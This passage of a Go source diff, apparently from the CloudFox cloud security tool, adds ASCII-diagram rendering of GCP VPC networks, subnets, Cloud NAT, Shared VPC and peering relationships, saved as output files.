subnetIdx++ { + // Subnet name + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + name := s.Name + if len(name) > subnetWidth-4 { + name = name[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // CIDR + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Flags (PGA, Logs) + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + pga := "PGA:N" + if s.PrivateIPGoogleAccess { + pga = "PGA:Y" + } + logs := "Logs:N" + if s.FlowLogsEnabled { + logs = "Logs:Y" + } + flags := fmt.Sprintf("[%s][%s]", pga, logs) + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + + // Bottom of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┘") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + } + + // Check for Cloud NAT + nats := natsByNetwork[key] + if len(nats) > 0 { + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ │ ┌────────────────────────┐ │ │\n") + for _, nat := range nats { + natIPs := "AUTO" + if len(nat.NATIPAddresses) > 0 { + natIPs = strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 18 { + natIPs = natIPs[:15] + "..." + } + } + sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", nat.Name[:min(11, len(nat.Name))])) + sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", nat.Region[:min(13, len(nat.Region))])) + sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs)) + } + sb.WriteString("│ │ └───────────┬────────────┘ │ │\n") + sb.WriteString("│ │ │ │ │\n") + sb.WriteString("│ │ ▼ │ │\n") + sb.WriteString("│ │ [INTERNET] │ │\n") + } + + // VPC footer + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ └") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┘ │\n") + + return sb.String() +} + +// drawSharedVPCSection draws Shared VPC host/service relationships +func (m *NetworkTopologyModule) drawSharedVPCSection() string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for hostProject, config := range m.SharedVPCs { + sb.WriteString("│ │\n") + sb.WriteString(fmt.Sprintf("│ ┌─────────────────────────────┐ │\n")) + sb.WriteString(fmt.Sprintf("│ │ HOST PROJECT │ │\n")) + + hostDisplay := hostProject + if len(hostDisplay) > 27 { + hostDisplay = hostDisplay[:24] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay)) + sb.WriteString(fmt.Sprintf("│ └──────────────┬──────────────┘ │\n")) + sb.WriteString(fmt.Sprintf("│ │ │\n")) + + if len(config.ServiceProjects) > 0 { + // Draw connection lines + numProjects := len(config.ServiceProjects) + if numProjects > 6 { + numProjects = 6 // Limit display + } + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + if i == 0 { + sb.WriteString("┌") + } else if i == numProjects-1 { + sb.WriteString("┬") + } else { + sb.WriteString("┬") + } + sb.WriteString("────────────") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString("┬────────────") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("▼ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", width-6-(numProjects*13)-14)) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("┌──────────┐ ")) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ... ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects && i < len(config.ServiceProjects); i++ { + proj := config.ServiceProjects[i] + if len(proj) > 10 { + proj = proj[:7] + "..." + } + sb.WriteString(fmt.Sprintf("│%-10s│ ", proj)) + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(fmt.Sprintf("(+%d more) ", len(config.ServiceProjects)-6)) + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + sb.WriteString("└──────────┘ ") + } + if len(config.ServiceProjects) > 6 { + sb.WriteString(" ") + } + sb.WriteString(strings.Repeat(" ", max(0, width-5-(numProjects*13)-12))) + sb.WriteString("│\n") + + sb.WriteString(fmt.Sprintf("│ (Service Projects: %d total) │\n", len(config.ServiceProjects))) + } else { + sb.WriteString("│ │ │\n") + sb.WriteString("│ └── (No service projects found) │\n") + } + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawPeeringSummary draws a summary of all VPC peering relationships +func (m *NetworkTopologyModule) drawPeeringSummary(peerings []VPCPeering) string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "VPC PEERING CONNECTIONS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for _, p := range peerings { + localNet := m.extractNetworkName(p.Network) + peerNet := m.extractNetworkName(p.PeerNetwork) + + // Truncate names if too long + if len(localNet) > 20 { + localNet = localNet[:17] + "..." + } + if len(peerNet) > 20 { + peerNet = peerNet[:17] + "..." + } + + stateIcon := "●" + if p.State != "ACTIVE" { + stateIcon = "○" + } + + importRoutes := "N" + if p.ImportCustomRoute { + importRoutes = "Y" + } + exportRoutes := "N" + if p.ExportCustomRoute { + exportRoutes = "Y" + } + + line := fmt.Sprintf("%s [%s] %s/%s ◄══════► %s/%s [Import:%s Export:%s]", + stateIcon, p.State[:min(6, len(p.State))], + p.ProjectID[:min(15, len(p.ProjectID))], localNet, + p.PeerProjectID[:min(15, len(p.PeerProjectID))], peerNet, + importRoutes, exportRoutes) + + if len(line) > width-4 { + line = line[:width-7] + "..." + } + + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + sb.WriteString("│ │\n") + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawLegend draws the diagram legend +func (m *NetworkTopologyModule) drawLegend() string { + var sb strings.Builder + width := 90 + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "LEGEND")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "PGA = Private Google Access", "● = Active peering")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Logs = VPC Flow Logs enabled", "○ = Inactive peering")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "[SHARED VPC HOST] = Shared VPC host project", "◄══► = Peering connection")) + sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Import/Export = Route exchange settings", "▼ = Traffic flow direction")) + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// min returns the minimum of two integers +func min(a, b int) int { + if a < b { + return a + } + return b +} + +// max returns the maximum of two integers +func max(a, b int) int { + if a > b { + return a + } + return b +} + // ------------------------------ // Loot File Management // ------------------------------ @@ -716,6 +1321,35 @@ func (m *NetworkTopologyModule) addSharedVPCToLoot(projectID string, config *Sha // Output Generation // ------------------------------ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateASCIIDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + break // Only add once for flat output; hierarchical will duplicate + } + + // For hierarchical output, add to all projects so it appears in each + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + } + } + } + if m.Hierarchy != nil && !m.FlatOutput { m.writeHierarchicalOutput(ctx, logger) } else { diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index bfb338bc..c68fcd0e 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -272,6 +273,35 @@ func (m *VPCNetworksModule) addPeeringToLoot(projectID string, peering vpcservic } func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateVPCNetworksDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["vpcnetworks-diagram"] = &internal.LootFile{ + Name: "vpcnetworks-diagram", + Contents: diagram, + } + } + } + } + if m.Hierarchy != nil && !m.FlatOutput { m.writeHierarchicalOutput(ctx, logger) } else { @@ -279,6 +309,67 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log } } +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateVPCNetworksDiagram creates an ASCII visualization of VPC networks +func (m *VPCNetworksModule) generateVPCNetworksDiagram() string { + allNetworks := m.getAllNetworks() + if len(allNetworks) == 0 { + return "" + } + + // Convert networks to diagram service types + diagramNetworks := make([]diagramservice.NetworkInfo, 0, len(allNetworks)) + for _, n := range allNetworks { + diagramNetworks = append(diagramNetworks, diagramservice.NetworkInfo{ + Name: n.Name, + ProjectID: n.ProjectID, + RoutingMode: n.RoutingMode, + MTU: 0, // VPCNetworkInfo doesn't have MTU + IsSharedVPC: false, + SharedVPCRole: "", + PeeringCount: len(n.Peerings), + }) + } + + // Build subnets by network + subnetsByNetwork := make(map[string][]diagramservice.SubnetInfo) + for _, s := range m.getAllSubnets() { + key := s.ProjectID + "/" + s.Network + subnetsByNetwork[key] = append(subnetsByNetwork[key], diagramservice.SubnetInfo{ + Name: s.Name, + Region: s.Region, + IPCIDRRange: s.IPCidrRange, + PrivateIPGoogleAccess: s.PrivateIPGoogleAccess, + FlowLogsEnabled: s.EnableFlowLogs, + }) + } + + // Convert peerings to diagram service types + diagramPeerings := make([]diagramservice.VPCPeeringInfo, 0, len(m.getAllPeerings())) + for _, p := range m.getAllPeerings() { + diagramPeerings = append(diagramPeerings, diagramservice.VPCPeeringInfo{ + Name: p.Name, + Network: p.Network, + PeerNetwork: p.PeerNetwork, + PeerProjectID: p.PeerProjectID, + State: p.State, + ExportRoutes: p.ExportCustomRoutes, + ImportRoutes: p.ImportCustomRoutes, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawVPCNetworksDiagram(diagramNetworks, subnetsByNetwork, diagramPeerings, projectID, 90) +} + func (m *VPCNetworksModule) getNetworksHeader() []string { return []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} } diff --git a/gcp/services/diagramService/diagramService.go b/gcp/services/diagramService/diagramService.go new file mode 100644 index 00000000..b8bc7f68 --- /dev/null +++ b/gcp/services/diagramService/diagramService.go @@ -0,0 +1,1309 @@ +package diagramservice + +import ( + "fmt" + "sort" + "strings" +) + +// DiagramConfig holds configuration for diagram generation +type DiagramConfig struct { + Width int // Default outer width + InnerWidth int // Default inner width + ShowLegend bool // Whether to show legend + CompactMode bool // Use compact layout +} + +// DefaultConfig returns sensible defaults for diagram generation +func DefaultConfig() DiagramConfig { + return DiagramConfig{ + Width: 90, + InnerWidth: 84, + ShowLegend: true, + CompactMode: false, + } +} + +// ======================================== +// Core Drawing Primitives +// ======================================== + +// DrawBox draws a simple box with centered title +func DrawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawBoxWithContent draws a box with title and content lines +func DrawBoxWithContent(title string, content []string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + + // Separator + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Content lines + for _, line := range content { + if len(line) > width-4 { + line = line[:width-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawSectionHeader draws a section header box +func DrawSectionHeader(title string, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + return sb.String() +} + +// DrawSectionFooter draws a section footer +func DrawSectionFooter(width int) string { + var sb strings.Builder + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + return sb.String() +} + +// DrawNestedBox draws a box nested inside another (with indentation) +func DrawNestedBox(title string, content []string, outerWidth, indent int) string { + var sb strings.Builder + innerWidth := outerWidth - (indent * 2) - 4 + + // Padding prefix + pad := strings.Repeat(" ", indent) + + // Top border + sb.WriteString(fmt.Sprintf("│%s┌%s┐%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + // Title + titleLine := title + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, titleLine, pad)) + + // Separator if content exists + if len(content) > 0 { + sb.WriteString(fmt.Sprintf("│%s├%s┤%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + for _, line := range content { + if len(line) > innerWidth-4 { + line = line[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, line, pad)) + } + } + + // Bottom border + sb.WriteString(fmt.Sprintf("│%s└%s┘%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + return sb.String() +} + +// DrawEmptyLine draws an empty content line +func DrawEmptyLine(width int) string { + return fmt.Sprintf("│%s│\n", strings.Repeat(" ", width-2)) +} + +// DrawTextLine draws a text line inside a box +func DrawTextLine(text string, width int) string { + if len(text) > width-4 { + text = text[:width-7] + "..." + } + return fmt.Sprintf("│ %-*s │\n", width-4, text) +} + +// ======================================== +// Network Diagram Components +// ======================================== + +// NetworkInfo represents a VPC network for diagram purposes +type NetworkInfo struct { + Name string + ProjectID string + RoutingMode string + MTU int64 + IsSharedVPC bool + SharedVPCRole string + PeeringCount int +} + +// SubnetInfo represents a subnet for diagram purposes +type SubnetInfo struct { + Name string + Region string + IPCIDRRange string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool +} + +// CloudNATInfo represents Cloud NAT for diagram purposes +type CloudNATInfo struct { + Name string + Region string + Network string + NATIPAddresses []string +} + +// FirewallRuleInfo represents a firewall rule for diagram purposes +type FirewallRuleInfo struct { + Name string + Direction string + Priority int64 + SourceRanges []string + AllowedPorts string + TargetTags string + IsPublicIngress bool + Disabled bool +} + +// LoadBalancerInfo represents a load balancer for diagram purposes +type LoadBalancerInfo struct { + Name string + Type string + Scheme string + IPAddress string + Port string + Region string + BackendServices []string + SecurityPolicy string +} + +// VPCPeeringInfo represents VPC peering for diagram purposes +type VPCPeeringInfo struct { + Name string + Network string + PeerNetwork string + PeerProjectID string + State string + ExportRoutes bool + ImportRoutes bool +} + +// SharedVPCConfig represents shared VPC configuration +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + Networks []string +} + +// ======================================== +// Network Topology Diagram Functions +// ======================================== + +// DrawNetworkTopologyDiagram generates a complete network topology ASCII diagram +func DrawNetworkTopologyDiagram( + networksByProject map[string][]NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, // key: "projectID/networkName" + natsByNetwork map[string][]CloudNATInfo, // key: "projectID/networkName" + peeringMap map[string][]VPCPeeringInfo, // key: "projectID/networkName" + sharedVPCs map[string]SharedVPCConfig, // key: hostProjectID + projectNames map[string]string, // projectID -> displayName +) string { + var sb strings.Builder + width := 90 + + // Header + sb.WriteString(DrawBox("GCP NETWORK TOPOLOGY", width)) + sb.WriteString("\n") + + // Sort projects for consistent output + var projectIDs []string + for projectID := range networksByProject { + projectIDs = append(projectIDs, projectID) + } + sort.Strings(projectIDs) + + // Draw each project + for _, projectID := range projectIDs { + networks := networksByProject[projectID] + displayName := projectNames[projectID] + sb.WriteString(drawProjectNetworks(projectID, displayName, networks, subnetsByNetwork, natsByNetwork, peeringMap, width)) + sb.WriteString("\n") + } + + // Draw Shared VPC relationships if any + if len(sharedVPCs) > 0 { + sb.WriteString(drawSharedVPCRelationships(sharedVPCs, width)) + sb.WriteString("\n") + } + + // Draw VPC Peering summary + allPeerings := collectAllPeerings(peeringMap) + if len(allPeerings) > 0 { + sb.WriteString(drawPeeringSummary(allPeerings, width)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(DrawNetworkLegend(width)) + + return sb.String() +} + +func drawProjectNetworks( + projectID, displayName string, + networks []NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + natsByNetwork map[string][]CloudNATInfo, + peeringMap map[string][]VPCPeeringInfo, + width int, +) string { + var sb strings.Builder + + projectTitle := fmt.Sprintf("PROJECT: %s", projectID) + if displayName != "" && displayName != projectID { + projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, displayName) + } + + // Project header + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Sort networks + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + + // Draw each VPC network + for _, network := range networks { + sb.WriteString(drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width)) + } + + // Project footer + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +func drawVPCNetwork( + network NetworkInfo, + subnetsByNetwork map[string][]SubnetInfo, + natsByNetwork map[string][]CloudNATInfo, + peeringMap map[string][]VPCPeeringInfo, + outerWidth int, +) string { + var sb strings.Builder + innerWidth := outerWidth - 6 + + // VPC header with attributes + vpcTitle := fmt.Sprintf("VPC: %s", network.Name) + vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU) + + // Add Shared VPC indicator + sharedVPCLabel := "" + if network.IsSharedVPC { + sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + + // Peering indicator + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount) + } + + sb.WriteString(DrawEmptyLine(outerWidth)) + sb.WriteString("│ ┌") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┐ │\n") + + // VPC title line + titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel) + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine)) + + sb.WriteString("│ ├") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┤ │\n") + + // Get subnets for this network + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + // Group subnets by region + subnetsByRegion := make(map[string][]SubnetInfo) + for _, s := range subnets { + subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s) + } + + // Sort regions + var regions []string + for region := range subnetsByRegion { + regions = append(regions, region) + } + sort.Strings(regions) + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)")) + } else { + // Draw subnets in a grid layout (3 per row) + subnetWidth := 26 + subnetsPerRow := 3 + + for i := 0; i < len(regions); i += subnetsPerRow { + endIdx := i + subnetsPerRow + if endIdx > len(regions) { + endIdx = len(regions) + } + rowRegions := regions[i:endIdx] + + // Top of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┐") + } + remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - ((len(rowRegions) - 1) * 2) + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Region name line + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionDisplay := region + if len(regionDisplay) > subnetWidth-4 { + regionDisplay = regionDisplay[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay)) + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Separator + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┤") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Subnet details for each region + maxSubnets := 0 + for _, region := range rowRegions { + if len(subnetsByRegion[region]) > maxSubnets { + maxSubnets = len(subnetsByRegion[region]) + } + } + + for subnetIdx := 0; subnetIdx < maxSubnets; subnetIdx++ { + // Subnet name + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + name := s.Name + if len(name) > subnetWidth-4 { + name = name[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, name)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // CIDR + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, s.IPCIDRRange)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Flags (PGA, Logs) + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionSubnets := subnetsByRegion[region] + if subnetIdx < len(regionSubnets) { + s := regionSubnets[subnetIdx] + pga := "PGA:N" + if s.PrivateIPGoogleAccess { + pga = "PGA:Y" + } + logs := "Logs:N" + if s.FlowLogsEnabled { + logs = "Logs:Y" + } + flags := fmt.Sprintf("[%s][%s]", pga, logs) + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, flags)) + } else { + sb.WriteString("│") + sb.WriteString(strings.Repeat(" ", subnetWidth-2)) + sb.WriteString("│") + } + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + + // Bottom of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┘") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + } + } + + // Check for Cloud NAT + nats := natsByNetwork[key] + if len(nats) > 0 { + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ │ ┌────────────────────────┐ │ │\n") + for _, nat := range nats { + natIPs := "AUTO" + if len(nat.NATIPAddresses) > 0 { + natIPs = strings.Join(nat.NATIPAddresses, ",") + if len(natIPs) > 18 { + natIPs = natIPs[:15] + "..." + } + } + natName := nat.Name + if len(natName) > 11 { + natName = natName[:11] + } + natRegion := nat.Region + if len(natRegion) > 13 { + natRegion = natRegion[:13] + } + sb.WriteString(fmt.Sprintf("│ │ │ Cloud NAT: %-11s │ │ │\n", natName)) + sb.WriteString(fmt.Sprintf("│ │ │ Region: %-13s │ │ │\n", natRegion)) + sb.WriteString(fmt.Sprintf("│ │ │ IPs: %-16s │ │ │\n", natIPs)) + } + sb.WriteString("│ │ └───────────┬────────────┘ │ │\n") + sb.WriteString("│ │ │ │ │\n") + sb.WriteString("│ │ ▼ │ │\n") + sb.WriteString("│ │ [INTERNET] │ │\n") + } + + // VPC footer + sb.WriteString("│ │ │ │\n") + sb.WriteString("│ └") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┘ │\n") + + return sb.String() +} + +func drawSharedVPCRelationships(sharedVPCs map[string]SharedVPCConfig, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, "SHARED VPC RELATIONSHIPS")) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + for hostProject, config := range sharedVPCs { + sb.WriteString(DrawEmptyLine(width)) + sb.WriteString("│ ┌─────────────────────────────┐ │\n") + sb.WriteString("│ │ HOST PROJECT │ │\n") + + hostDisplay := hostProject + if len(hostDisplay) > 27 { + hostDisplay = hostDisplay[:24] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-27s │ │\n", hostDisplay)) + sb.WriteString("│ └──────────────┬──────────────┘ │\n") + sb.WriteString("│ │ │\n") + + if len(config.ServiceProjects) > 0 { + numProjects := len(config.ServiceProjects) + if numProjects > 6 { + numProjects = 6 + } + + sb.WriteString("│ ") + for i := 0; i < numProjects; i++ { + if i == 0 { + sb.WriteString("┌") + } else { + 